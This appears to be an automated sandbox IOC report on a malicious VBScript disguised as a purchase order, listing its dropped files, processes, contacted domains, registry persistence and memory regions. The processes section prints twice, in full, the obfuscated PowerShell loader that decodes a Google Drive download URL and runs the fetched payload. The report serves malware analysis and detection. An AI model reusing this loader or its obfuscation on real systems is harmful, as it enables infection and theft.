IOC Report
Purchase Order N#U00b0 20240702.vbs

loading gif

Files

File Path
Type
Category
Malicious
Purchase Order N#U00b0 20240702.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c0g025ep.ybw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4qj2m4c.yc1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qzjtzp5a.znq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0ifmrza.kf5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Rundtenommer.Rhy
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Roaming\ysaPFN\ysaPFN.exe
PE32 executable (GUI) Intel 80386, for MS Windows
modified

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order N#U00b0 20240702.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly';If (${host}.CurrentCulture) {$cyperaceous++;}Function Lecithalbumin($Transfusionskanylerne){$tysklandsrejse=$Transfusionskanylerne.Length-$cyperaceous;$Undersupplied='SUBsTRI';$Undersupplied+='ng';For( $Elisioner=2;$Elisioner -lt $tysklandsrejse;$Elisioner+=3){$Unscrambles+=$Transfusionskanylerne.$Undersupplied.Invoke( $Elisioner, $cyperaceous);}$Unscrambles;}function Rysters($Baksningers){ & ($Datolinjerne) ($Baksningers);}$Eftersprgslens107=Lecithalbumin 'VkMNoo oz Mi.nl Nl ea.i/ .5Fj.G.0 m E.(PhW ,i Sn.edFao SwUms F ,N,aT S Su1,u0H .Cy0in;ov A,W oiT,nL,6Tr4Va;O. OsxGa6Do4d ;Cl Cor EvSe: S1,i2Ne1Re. e0Pl)Pe .dGE eStcBak Ho ,/ V2Sa0Dy1Th0 .0Me1Om0 .1fo RoFAri rBeePifvaoadxK,/af1re2 i1.c.Ad0Se ';$Mottolike90=Lecithalbumin 'GeUL.sPheSurLu- .A .g BeS.nAptRu ';$Impossible236=Lecithalbumin ',ahCat ntHepP.s U:Ug/ C/ SdEnrPliSmv,eeIn.,ag AoDaoDjg ,lThe A.F cEnoDimUf/SyuDacHo?,oe IxUnpEpoKarN.tFo=U dXxo MwUnnSylJooEpaG,dTh&Bui ,d h=in1,cySuz eBaOA RZilReWP dCoW .KAtE S1Gu5 eSpn,o4T vgl7Cat u0Pay.ymalp.l9Bl6 DmcrbTr-ArKBrlKrURuQ u ';$Oversocially=Lecithalbumin 'Re>Br ';$Datolinjerne=Lecithalbumin ' Gi Bea,x F ';$Biles='Regnestokkene';$ekstemporeringernes = Lecithalbumin 'MieLocBrhElo,f do%Pea,up apM d .a,ptsoaIt%,u\PoRPiuB,n.ad,ktS,e .nCoo.fmSemHye r E.AtR Uh Dy S K& .&Mi ReRecGlhBroPe T tHo ';Rysters (Lecithalbumin '.r$e.g AlBlo mbTia AlU.: BDUni ,a DcVao .dSyiSioB nVa1Sm2K.5 u=St(YecT.mHedPo P/.ycTe Te$,ae Sk.osKotAneUrm ip,noP r,eeSjrReiD,n agPrePsr tnS.eD.sR.)Po ');Rysters (Lecithalbumin 'Fo$IngG,lStoT.bS.aexl.l:AlSnotSoag d .iBro RnCee lr sMo=,e$brI im.epUnoNosAfsBriHeb Pl.oeDa2Ud3 ,6Ga.Scs Rp Dl,hiret T(L.$BeO PvC,e SrResVioHjc PiFeaE.lKll CyU.) G ');Rysters (Lecithalbumin 'M.[ eNV,eSctKa.JuS beSmrPivEsiPoc Ge TP mo DiManRltCoMMiakonhea .g.neThrSu]Or:In:.eSFueAlc u arSti St,eyLaPRur no ntC oalcMio.olS ,r=Ke Ly[PrN Se ,t ,.SpS .e .cDeu,tr NiSet DyRoPBir OoBitTeoCocLso ulKaTT.y op e.l],o:Fo:SyTSkls,sb 1Tj2H ');$Impossible236=$Stadioners[0];$Cottonopolis= (Lecithalbumin 'In$lig.dlL.o LbOraJal L:PrU,nt ,y,opKoi s.rkP,eTisP.=flN.geFiw ,-OuOD bn j,neDicw.t a M,S RyDrsRet,eeP.m ..LiNYneRatS,.L,W,aeRobFoCF lRei ,eSlnC,t');$Cottonopolis+=$Diacodion125[1];Rysters ($Cottonopolis);Rysters (Lecithalbumin 'Re$InU vt SyEnpPliA,sArkBre OsLi.StH Oep.aA,dL.ener os T[Su$ ,MU oAlt,otReo .l CiI.kOre F9 ,0He] T=,n$F EU.f,ptKoeBir,asYtpTjrRugGesPhlMoeCan,esLs1Fo0Ha7r. ');$Naiades=Lecithalbumin 'Re$ SUl.tO,yOvp ,iNosS kuseHesOx.ZwDYdofowRon kl,aoAaaPedPrFReiFalDreS.(ye$F I Pm ipP oS s .s Ti Bb KlH.eCh2Sk3 i6 ,,Ny$,iIudsAtoGopUntGaiBlcSm) E ';$Isoptic=$Diacodion125[0];Rysters (Lecithalbumin ' D$b,g.ulCao qbreaN lPa: ,f Do rrG.sC.tE u RmPrmOpeU dSre Ds,t=On(TuT Pe ,sD t F-PhPThaKot hc Pr$ ,I s coBipS,tUniPtcat)N ');while (!$forstummedes) {Rysters (Lecithalbumin 'Ou$Spg Fl,toKibTaaIgl.r:P A ,m Fo,or,at OiTrsN a PtFoi lo HnE,eSjrTssNa7A 8un=Fo$TitRar PuAne D ') ;Rysters $Naiades;Rysters (Lecithalbumin 'BaS,etMea PrIntB.-i.SSvl KeCheO,p.a A4U, ');Rysters (Lecithalbumin 'St$Geg.ylScoSyb ,aP,lYp:.nf .o ,rB.sLit,nu.emEsmLae,adAbe TsPr=.e( MTS,e,as Lt a-MoPReaGrt AhIn Ed$DaIAgs,uoUdpUvtA,iDecSy) V ') ;Rysters (Lecithalbumin 'A,$ RgFal Ho Ob aP.lHo:CoFB,e.at,lipocI.hEldMyyForNdkToeF,r an.aeChsMi=Te$sng GlEuoErbOra nl S:PrIResDelSynafdReiV.nCog PeBarovsLa1Ko9e.8N.+ U+S,%Fo$PrS RtU.alud BiL,oWanS eJorSksUn.trcStoGeuFon ntS ') ;$Impossible236=$Stadioners[$Fetichdyrkernes];}$Trellised=287214;$Christianias26=27464;Rysters (Lecithalbumin 'Ve$trg el ,os,b AaG l T:OvASur b PeHajAud BsSkdOme lTai knAlgEls , Be=L AGa,eK,t,k-o,CHeo snFitsoeBanTot J Un$GrIInsK.oSupSat ii cMe ');Rysters (Lecithalbumin 'Tr$Klgm,lSeoK b,uaDel R:GlI EnTodSus ok.krCeiFaf utAceorrAfn,ae .sU, T.= B Un[,oSDiyEnsRetIneUlm . ,CO.oEpn Gv Te .r ,tPo]S :Se:UnFGrrMaoOtmEkB MaM,sFieU.6Do4AsSCotExrS i Dn,egTj( .$ DANarUnbDyeHnjVod Ps AdLee lS iBon .gMasMe)s. ');Rysters (Lecithalbumin 'vu$IngO.l oKob FaFolSt:D,f Bo Fd UrDioAndU s .kUnnUnoIngR lF eCorGenl eKi B.=B. Pa[AfS,rySts FtLne ,mKb.EnTGre,cxb,tPr. Er nThcE oSud AiYanIngDe]Po:Sp:MaAStSSkC .IM Iuf.E,GF eMutSuSDitp rdeiUdnT.gS,( .$RiIUsn.nd RsJek nrAriJefCotKoeTyr OnT e CsD )Co ');Rysters (Lecithalbumin 'Di$ ogchl Po.db aPal,o:.mHS,aVai,ir IbE,aE,nV d .sP.=Tr$ .fS,oJadSkr SoImd sDrkAmn Ho fgFolAneSnrG,n reCe.U.s ,uS.bHosNotCorOvi FnGegSu( S$GoTK.r ieKal,al .iHysToe.vdDi,K,$HeC Eh .r aiDes rtUkiDoaSyn HiAra,gsna2P.6Un)N, ');Rysters $Hairbands;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly';If (${host}.CurrentCulture) {$cyperaceous++;}Function Lecithalbumin($Transfusionskanylerne){$tysklandsrejse=$Transfusionskanylerne.Length-$cyperaceous;$Undersupplied='SUBsTRI';$Undersupplied+='ng';For( $Elisioner=2;$Elisioner -lt $tysklandsrejse;$Elisioner+=3){$Unscrambles+=$Transfusionskanylerne.$Undersupplied.Invoke( $Elisioner, $cyperaceous);}$Unscrambles;}function Rysters($Baksningers){ & ($Datolinjerne) ($Baksningers);}$Eftersprgslens107=Lecithalbumin 'VkMNoo oz Mi.nl Nl ea.i/ .5Fj.G.0 m E.(PhW ,i Sn.edFao SwUms F ,N,aT S Su1,u0H .Cy0in;ov A,W oiT,nL,6Tr4Va;O. OsxGa6Do4d ;Cl Cor EvSe: S1,i2Ne1Re. e0Pl)Pe .dGE eStcBak Ho ,/ V2Sa0Dy1Th0 .0Me1Om0 .1fo RoFAri rBeePifvaoadxK,/af1re2 i1.c.Ad0Se ';$Mottolike90=Lecithalbumin 'GeUL.sPheSurLu- .A .g BeS.nAptRu ';$Impossible236=Lecithalbumin ',ahCat ntHepP.s U:Ug/ C/ SdEnrPliSmv,eeIn.,ag AoDaoDjg ,lThe A.F cEnoDimUf/SyuDacHo?,oe IxUnpEpoKarN.tFo=U dXxo MwUnnSylJooEpaG,dTh&Bui ,d h=in1,cySuz eBaOA RZilReWP dCoW .KAtE S1Gu5 eSpn,o4T vgl7Cat u0Pay.ymalp.l9Bl6 DmcrbTr-ArKBrlKrURuQ u ';$Oversocially=Lecithalbumin 'Re>Br ';$Datolinjerne=Lecithalbumin ' Gi Bea,x F ';$Biles='Regnestokkene';$ekstemporeringernes = Lecithalbumin 'MieLocBrhElo,f do%Pea,up apM d .a,ptsoaIt%,u\PoRPiuB,n.ad,ktS,e .nCoo.fmSemHye r E.AtR Uh Dy S K& .&Mi ReRecGlhBroPe T tHo ';Rysters (Lecithalbumin '.r$e.g AlBlo mbTia AlU.: BDUni ,a DcVao .dSyiSioB nVa1Sm2K.5 u=St(YecT.mHedPo P/.ycTe Te$,ae Sk.osKotAneUrm ip,noP r,eeSjrReiD,n agPrePsr tnS.eD.sR.)Po ');Rysters (Lecithalbumin 'Fo$IngG,lStoT.bS.aexl.l:AlSnotSoag d .iBro RnCee lr sMo=,e$brI im.epUnoNosAfsBriHeb Pl.oeDa2Ud3 ,6Ga.Scs Rp Dl,hiret T(L.$BeO PvC,e SrResVioHjc PiFeaE.lKll CyU.) G ');Rysters (Lecithalbumin 'M.[ eNV,eSctKa.JuS beSmrPivEsiPoc Ge TP mo DiManRltCoMMiakonhea .g.neThrSu]Or:In:.eSFueAlc u arSti St,eyLaPRur no ntC oalcMio.olS ,r=Ke Ly[PrN Se ,t ,.SpS .e .cDeu,tr NiSet DyRoPBir OoBitTeoCocLso ulKaTT.y op e.l],o:Fo:SyTSkls,sb 1Tj2H ');$Impossible236=$Stadioners[0];$Cottonopolis= (Lecithalbumin 'In$lig.dlL.o LbOraJal L:PrU,nt ,y,opKoi s.rkP,eTisP.=flN.geFiw ,-OuOD bn j,neDicw.t a M,S RyDrsRet,eeP.m ..LiNYneRatS,.L,W,aeRobFoCF lRei ,eSlnC,t');$Cottonopolis+=$Diacodion125[1];Rysters ($Cottonopolis);Rysters (Lecithalbumin 'Re$InU vt SyEnpPliA,sArkBre OsLi.StH Oep.aA,dL.ener os T[Su$ ,MU oAlt,otReo .l CiI.kOre F9 ,0He] T=,n$F EU.f,ptKoeBir,asYtpTjrRugGesPhlMoeCan,esLs1Fo0Ha7r. ');$Naiades=Lecithalbumin 'Re$ SUl.tO,yOvp ,iNosS kuseHesOx.ZwDYdofowRon kl,aoAaaPedPrFReiFalDreS.(ye$F I Pm ipP oS s .s Ti Bb KlH.eCh2Sk3 i6 ,,Ny$,iIudsAtoGopUntGaiBlcSm) E ';$Isoptic=$Diacodion125[0];Rysters (Lecithalbumin ' D$b,g.ulCao qbreaN lPa: ,f Do rrG.sC.tE u RmPrmOpeU dSre Ds,t=On(TuT Pe ,sD t F-PhPThaKot hc Pr$ ,I s coBipS,tUniPtcat)N ');while (!$forstummedes) {Rysters (Lecithalbumin 'Ou$Spg Fl,toKibTaaIgl.r:P A ,m Fo,or,at OiTrsN a PtFoi lo HnE,eSjrTssNa7A 8un=Fo$TitRar PuAne D ') ;Rysters $Naiades;Rysters (Lecithalbumin 'BaS,etMea PrIntB.-i.SSvl KeCheO,p.a A4U, ');Rysters (Lecithalbumin 'St$Geg.ylScoSyb ,aP,lYp:.nf .o ,rB.sLit,nu.emEsmLae,adAbe TsPr=.e( MTS,e,as Lt a-MoPReaGrt AhIn Ed$DaIAgs,uoUdpUvtA,iDecSy) V ') ;Rysters (Lecithalbumin 'A,$ RgFal Ho Ob aP.lHo:CoFB,e.at,lipocI.hEldMyyForNdkToeF,r an.aeChsMi=Te$sng GlEuoErbOra nl S:PrIResDelSynafdReiV.nCog PeBarovsLa1Ko9e.8N.+ U+S,%Fo$PrS RtU.alud BiL,oWanS eJorSksUn.trcStoGeuFon ntS ') ;$Impossible236=$Stadioners[$Fetichdyrkernes];}$Trellised=287214;$Christianias26=27464;Rysters (Lecithalbumin 'Ve$trg el ,os,b AaG l T:OvASur b PeHajAud BsSkdOme lTai knAlgEls , Be=L AGa,eK,t,k-o,CHeo snFitsoeBanTot J Un$GrIInsK.oSupSat ii cMe ');Rysters (Lecithalbumin 'Tr$Klgm,lSeoK b,uaDel R:GlI EnTodSus ok.krCeiFaf utAceorrAfn,ae .sU, T.= B Un[,oSDiyEnsRetIneUlm . ,CO.oEpn Gv Te .r ,tPo]S :Se:UnFGrrMaoOtmEkB MaM,sFieU.6Do4AsSCotExrS i Dn,egTj( .$ DANarUnbDyeHnjVod Ps AdLee lS iBon .gMasMe)s. ');Rysters (Lecithalbumin 'vu$IngO.l oKob FaFolSt:D,f Bo Fd UrDioAndU s .kUnnUnoIngR lF eCorGenl eKi B.=B. Pa[AfS,rySts FtLne ,mKb.EnTGre,cxb,tPr. Er nThcE oSud AiYanIngDe]Po:Sp:MaAStSSkC .IM Iuf.E,GF eMutSuSDitp rdeiUdnT.gS,( .$RiIUsn.nd RsJek nrAriJefCotKoeTyr OnT e CsD )Co ');Rysters (Lecithalbumin 'Di$ ogchl Po.db aPal,o:.mHS,aVai,ir IbE,aE,nV d .sP.=Tr$ .fS,oJadSkr SoImd sDrkAmn Ho fgFolAneSnrG,n reCe.U.s ,uS.bHosNotCorOvi FnGegSu( S$GoTK.r ieKal,al .iHysToe.vdDi,K,$HeC Eh .r aiDes rtUkiDoaSyn HiAra,gsna2P.6Un)N, ');Rysters $Hairbands;"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rundtenommer.Rhy && echo t"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rundtenommer.Rhy && echo t"

URLs

Name
IP
Malicious
http://nuget.org/NuGet.exe
unknown
http://drive.usercontent.google.com
unknown
https://drive.goog
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://crl.microsoft
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://drive.google.com/uc?ex
unknown
https://drive.google.com/u
unknown
https://go.micro
unknown
https://drive.google.co0
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.googP
unknown
https://drive.usercontent.googh
unknown
https://drive.usercontent.google.com/
unknown
http://drive.google.com
unknown
https://drive.google.
unknown
https://drive.go
unknown
https://github.com/Pester/Pester
unknown
http://r3.i.lencr.org/0
unknown
https://drive.goo
unknown
https://www.google.com
unknown
https://drive.g
unknown
https://drive.google.com/uc
unknown
https://drive.google.com/X
unknown
http://x1.c.lencr
unknown
https://aka.ms/pscore6lB
unknown
https://drive.google.com/
unknown
http://x1.c.lencr.org/0
unknown
http://x1.i.lencr.org/0
unknown
https://drive.googl
unknown
https://drive.google.com/uc?e
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://ip-api.com
unknown
http://r3.o.lencr.org0
unknown
https://drive.google.com
unknown
https://drive.usercontent.google.com
unknown
https://drive.google.c
unknown
https://aka.ms/pscore68
unknown
https://apis.google.com
unknown
https://drive.google.com/uc?
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://drive.usercontent.google.com/3
unknown
http://ysmglobalsourcing.com
unknown
https://drive.google
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 37 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ip-api.com
208.95.112.1
malicious
bg.microsoft.map.fastly.net
199.232.210.172
drive.google.com
142.250.185.206
drive.usercontent.google.com
142.250.185.161
ysmglobalsourcing.com
107.181.234.46

IPs

IP
Domain
Country
Malicious
208.95.112.1
ip-api.com
United States
malicious
142.250.185.206
drive.google.com
United States
142.250.185.161
drive.usercontent.google.com
United States
107.181.234.46
ysmglobalsourcing.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ysaPFN
There are 20 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
228A5000
trusted library allocation
page read and write
malicious
5999000
trusted library allocation
page read and write
malicious
8450000
direct allocation
page execute and read and write
malicious
96C9000
direct allocation
page execute and read and write
malicious
228D2000
trusted library allocation
page read and write
malicious
262DBFD9000
trusted library allocation
page read and write
malicious
262CDDAB000
trusted library allocation
page read and write
6FA4000
heap
page read and write
262E4741000
heap
page read and write
24B34000
heap
page read and write
24FA0000
trusted library allocation
page read and write
1CB08418000
heap
page read and write
24B43000
heap
page read and write
1CB08443000
heap
page read and write
22310000
heap
page read and write
1CB08308000
heap
page read and write
7040000
direct allocation
page read and write
228D0000
trusted library allocation
page read and write
6F31000
heap
page read and write
707C000
heap
page read and write
1CB08511000
heap
page read and write
262CDD6E000
trusted library allocation
page read and write
228F1000
trusted library allocation
page read and write
6EE0000
direct allocation
page read and write
24F90000
trusted library allocation
page read and write
262CC434000
trusted library allocation
page read and write
71F0000
trusted library allocation
page read and write
72BE000
stack
page read and write
7DB0000
trusted library allocation
page execute and read and write
24F80000
trusted library allocation
page read and write
24F70000
trusted library allocation
page read and write
24F81000
trusted library allocation
page read and write
24F80000
trusted library allocation
page read and write
256C0000
trusted library allocation
page read and write
25FE000
stack
page read and write
24F7D000
trusted library allocation
page read and write
1CB08721000
heap
page read and write
814D000
heap
page read and write
8122000
heap
page read and write
6FB3000
heap
page read and write
7FFAAC3B0000
trusted library allocation
page read and write
262CA440000
heap
page read and write
262CC49F000
trusted library allocation
page read and write
262CA6B0000
trusted library allocation
page read and write
1CB08435000
heap
page read and write
22871000
trusted library allocation
page read and write
24F80000
trusted library allocation
page read and write
7FFAAC2FA000
trusted library allocation
page read and write
24FE0000
trusted library allocation
page read and write
83C0000
trusted library allocation
page read and write
7130000
trusted library allocation
page read and write
1CB082E4000
heap
page read and write
83B0000
trusted library allocation
page read and write
7FFAAC300000
trusted library allocation
page execute and read and write
228F5000
trusted library allocation
page read and write
712B000
heap
page read and write
24FE0000
trusted library allocation
page read and write
262CA4BC000
heap
page read and write
1CB08412000
heap
page read and write
249C2000
trusted library allocation
page read and write
59A9000
remote allocation
page execute and read and write
24F90000
trusted library allocation
page read and write
22860000
heap
page execute and read and write
6EC0000
direct allocation
page read and write
7FFAAC480000
trusted library allocation
page read and write
2EED000
trusted library allocation
page execute and read and write
3050000
heap
page read and write
24FA0000
trusted library allocation
page read and write
300E000
stack
page read and write
262DBF91000
trusted library allocation
page read and write
6E47000
heap
page read and write
1FF269B0000
heap
page read and write
1FF26CC4000
heap
page read and write
262CC806000
trusted library allocation
page read and write
7FFAAC380000
trusted library allocation
page read and write
24F80000
trusted library allocation
page read and write
7FFAAC200000
trusted library allocation
page execute and read and write
24F90000
trusted library allocation
page read and write
318F000
unkown
page read and write
7FFAAC3E0000
trusted library allocation
page read and write
262CA500000
heap
page read and write
1CB088D7000
heap
page read and write
262CBF60000
heap
page read and write
6FA7000
heap
page read and write
262CA4F3000
heap
page read and write
24FD0000
trusted library allocation
page read and write
1CB082F8000
heap
page read and write
7E80000
heap
page read and write
1CB088D7000
heap
page read and write
45A9000
remote allocation
page execute and read and write
805C000
stack
page read and write
24A69000
trusted library allocation
page read and write
7FFAAC15B000
trusted library allocation
page read and write
709B000
heap
page read and write
71D0000
trusted library allocation
page read and write
1FF26CC0000
heap
page read and write
6EB0000
direct allocation
page read and write
256AD000
stack
page read and write
262CDD7E000
trusted library allocation
page read and write
24FF0000
trusted library allocation
page execute and read and write
1CB08721000
heap
page read and write
24A4C000
stack
page read and write
24FA0000
trusted library allocation
page read and write
262E458C000
heap
page read and write
262CBE80000
trusted library allocation
page read and write
46F1000
trusted library allocation
page read and write
80680BE000
stack
page read and write
2EE4000
trusted library allocation
page read and write
1CB082E1000
heap
page read and write
22640000
remote allocation
page read and write
1CB088D7000
heap
page read and write
1CB08418000
heap
page read and write
8067B7D000
stack
page read and write
2283E000
stack
page read and write
24F87000
trusted library allocation
page read and write
6EBF0000
unkown
page readonly
262CA541000
heap
page read and write
22730000
trusted library allocation
page read and write
24F70000
trusted library allocation
page read and write
84A0000
direct allocation
page read and write
6F8E000
heap
page read and write
258EE000
stack
page read and write
7140000
heap
page execute and read and write
7370000
trusted library allocation
page read and write
2499E000
trusted library allocation
page read and write
262CDD58000
trusted library allocation
page read and write
24F80000
trusted library allocation
page read and write
22850000
trusted library allocation
page read and write
7FFAAC360000
trusted library allocation
page read and write
262CC428000
trusted library allocation
page read and write
23871000
trusted library allocation
page read and write
7054000
heap
page read and write
1CB088D7000
heap
page read and write
6F6A000
heap
page read and write
6C6E000
stack
page read and write
24F80000
trusted library allocation
page read and write
24F80000
trusted library allocation
page read and write
1CB08451000
heap
page read and write
24F90000
trusted library allocation
page read and write
1CB082E1000
heap
page read and write
2B3D000
stack
page read and write
24F80000
trusted library allocation
page read and write
1CB08463000
heap
page read and write
249AE000
trusted library allocation
page read and write
2A34000
trusted library allocation
page read and write
2FDD000
stack
page read and write
1CB0665F000
heap
page read and write
1CB08721000
heap
page read and write
262CC858000
trusted library allocation
page read and write
224AE000
stack
page read and write
249A2000
trusted library allocation
page read and write
4FA9000
remote allocation
page execute and read and write
24BBE000
stack
page read and write
1CB08721000
heap
page read and write
70D8000
heap
page read and write
1CB08409000
heap
page read and write
6F1F000
stack
page read and write
2988000
heap
page read and write
6EDE000
stack
page read and write
24B25000
heap
page read and write
1CB088D7000
heap
page read and write
46E0000
heap
page execute and read and write
7390000
trusted library allocation
page read and write
1CB08721000
heap
page read and write
238D0000
trusted library allocation
page read and write
262CBEE0000
heap
page read and write
290E000
stack
page read and write
24FB0000
trusted library allocation
page read and write
446E000
stack
page read and write
5750000
trusted library allocation
page read and write
1CB088D8000
heap
page read and write
24A70000
heap
page read and write
8067DBF000
stack
page read and write
24F90000
trusted library allocation
page read and write
24F70000
trusted library allocation
page read and write
262CDFE7000
trusted library allocation
page read and write
6EBF1000
unkown
page execute read
2A80000
trusted library allocation
page read and write
24B4C000
heap
page read and write
24FB6000
trusted library allocation
page read and write
262CDDE9000
trusted library allocation
page read and write
24FE0000
trusted library allocation
page read and write
1CB0858F000
heap
page read and write
1CB088D8000
heap
page read and write
262CC65E000
trusted library allocation
page read and write
1CB088D8000
heap
page read and write
24F80000
trusted library allocation
page read and write
6EC0D000
unkown
page read and write
7FFAAC1FC000
trusted library allocation
page execute and read and write
7FFAAC2F1000
trusted library allocation
page read and write
257AE000
stack
page read and write
44F0000
heap
page read and write
24F80000
trusted library allocation
page read and write
6EC06000
unkown
page readonly
6FBE000
heap
page read and write
262CC828000
trusted library allocation
page read and write
6ED0000
direct allocation
page read and write
2242E000
stack
page read and write
22750000
trusted library allocation
page read and write
24F90000
trusted library allocation
page read and write
7FFB22710000
unkown
page read and write
45FE000
stack
page read and write
262CC7EE000
trusted library allocation
page read and write
839D000
stack
page read and write
262CC449000
trusted library allocation
page read and write
24F7D000
trusted library allocation
page read and write
24F90000
trusted library allocation
page read and write
24FC0000
trusted library allocation
page read and write
